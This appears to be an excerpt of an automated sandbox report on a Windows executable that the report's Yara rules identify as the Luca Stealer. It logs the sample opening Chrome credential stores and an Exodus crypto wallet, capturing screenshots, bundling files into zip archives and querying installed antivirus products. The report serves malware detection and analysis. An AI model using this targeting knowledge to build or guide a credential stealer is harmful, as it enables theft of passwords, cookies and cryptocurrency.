                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\VWDFPKGDUF.xlsx VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\WHZAGPPPLA.png VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\WSHEJMDVQC.docx VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\WSHEJMDVQC.docx VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\WSHEJMDVQC.png VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf1fTKN9EhSgWt7S8swS8tNH3PELke\cookies_google_default.txt VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf1fTKN9EhSgWt7S8swS8tNH3PELke\cookies_google_default.txt VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf1fTKN9EhSgWt7S8swS8tNH3PELke\screen1.png VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf1fTKN9EhSgWt7S8swS8tNH3PELke\screen1.png VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf1fTKN9EhSgWt7S8swS8tNH3PELke\sensfiles.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf1fTKN9EhSgWt7S8swS8tNH3PELke\sensfiles.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf1fTKN9EhSgWt7S8swS8tNH3PELke\user_info.txt VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf1fTKN9EhSgWt7S8swS8tNH3PELke\user_info.txt VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Temp\out.zip VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BA4D11 memcpy,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,EnumDisplayMonitors,memcpy,HeapFree,CreateDCW,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,DeleteDC,memset,EnumDisplaySettingsExW,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,EnumDisplayMonitors,memcpy,HeapFree,HeapFree,HeapFree,CreateDCW,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,StretchBlt,GetDIBits,GetObjectW,memcpy,DeleteDC,DeleteDC,DeleteDC,DeleteObject,memcpy,memcpy,memcpy,memcpy,HeapFree,memcpy,HeapFree,HeapFree,HeapFree,RtlDeleteBoundaryDescriptor,HeapFree,HeapFree,RtlDeleteBoundaryDescriptor,HeapFree,HeapFree,HeapFree,HeapFree,RtlDeleteBoundaryDescriptor,RtlReleasePrivilege,RtlDeleteBoundaryDescriptor,RtlDeleteBoundaryDescriptor,HeapFree,HeapFree,HeapFree,RtlDeleteBoundaryDescriptor,memcpy,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,CloseHandle,HeapFree,HeapFree,GetSystemTimeAsFileTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,SystemTimeToFileTime,memset,GetTimeZoneInformation,memcpy,memcpy,memcpy,HeapFree,memcpy,memcpy,HeapFree,HeapFree,HeapFree,CloseHandle,memcpy,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,CloseHandle,HeapFree,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,HeapFree,HeapFree,memcpy,HeapFree,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,HeapFree,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,CloseHandle,RtlDeleteBoundaryDescriptor,HeapFree,HeapFree,DeleteDC,DeleteDC,DeleteDC,DeleteObject,DeleteDC,DeleteDC,DeleteDC,DeleteObject,HeapFree,HeapFree,CloseHandle,CloseHandle,SleepEx,0_2_00007FF768BA4D11
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BA4D11 memcpy,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,EnumDisplayMonitors,memcpy,HeapFree,CreateDCW,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,DeleteDC,memset,EnumDisplaySettingsExW,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,EnumDisplayMonitors,memcpy,HeapFree,HeapFree,HeapFree,CreateDCW,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,StretchBlt,GetDIBits,GetObjectW,memcpy,DeleteDC,DeleteDC,DeleteDC,DeleteObject,memcpy,memcpy,memcpy,memcpy,HeapFree,memcpy,HeapFree,HeapFree,HeapFree,RtlDeleteBoundaryDescriptor,HeapFree,HeapFree,RtlDeleteBoundaryDescriptor,HeapFree,HeapFree,HeapFree,HeapFree,RtlDeleteBoundaryDescriptor,RtlReleasePrivilege,RtlDeleteBoundaryDescriptor,RtlDeleteBoundaryDescriptor,HeapFree,HeapFree,HeapFree,RtlDeleteBoundaryDescriptor,memcpy,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,CloseHandle,HeapFree,HeapFree,GetSystemTimeAsFileTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,SystemTimeToFileTime,memset,GetTimeZoneInformation,memcpy,memcpy,memcpy,HeapFree,memcpy,memcpy,HeapFree,HeapFree,HeapFree,CloseHandle,memcpy,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,CloseHandle,HeapFree,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,HeapFree,HeapFree,memcpy,HeapFree,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,HeapFree,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,CloseHandle,RtlDeleteBoundaryDescriptor,HeapFree,HeapFree,DeleteDC,DeleteDC,DeleteDC,DeleteObject,DeleteDC,DeleteDC,DeleteDC,DeleteObject,HeapFree,HeapFree,CloseHandle,CloseHandle,SleepEx,0_2_00007FF768BA4D11
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Luca Stealer
                  Source: Yara matchFile source: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe.7ff768b70000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe.7ff768b70000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000003.271121352.000001C7F3912000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.271472602.000001C7F3912000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.245071773.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe PID: 6044, type: MEMORYSTR
                  Tries to steal Crypto Currency Wallets
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\Jump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_pjkljhegncpnkpknbcohdijeoejaedia\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Reporting and NEL-journal\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db-journal\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOCK\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOG\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\CURRENT\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shortcuts\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\CURRENT\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites-journal\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Action Predictor-journal\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\index\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOCK\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000009.log\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\000003.log\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shortcuts-journal\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOG\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Action Predictor\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000008\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\LOG.old\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOCK\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\CURRENT\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG.old\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\000003.log\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\LOCK\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\LOCK\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DownloadMetadata\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_2\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\LOG\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PreferredApps\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\LOG\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\LOG\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\MANIFEST-000001\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db-journal\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage\QuotaManager\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Google Profile.ico\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Tabs_13305159347206338\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\CURRENT\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Favicons\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Reporting and NEL\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOCK\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing Cookies-journal\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\CURRENT\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Visited Links\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\MANIFEST-000001\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_3\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOCK\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Affiliation Database\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\CURRENT\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal\Login DataJump to behavior
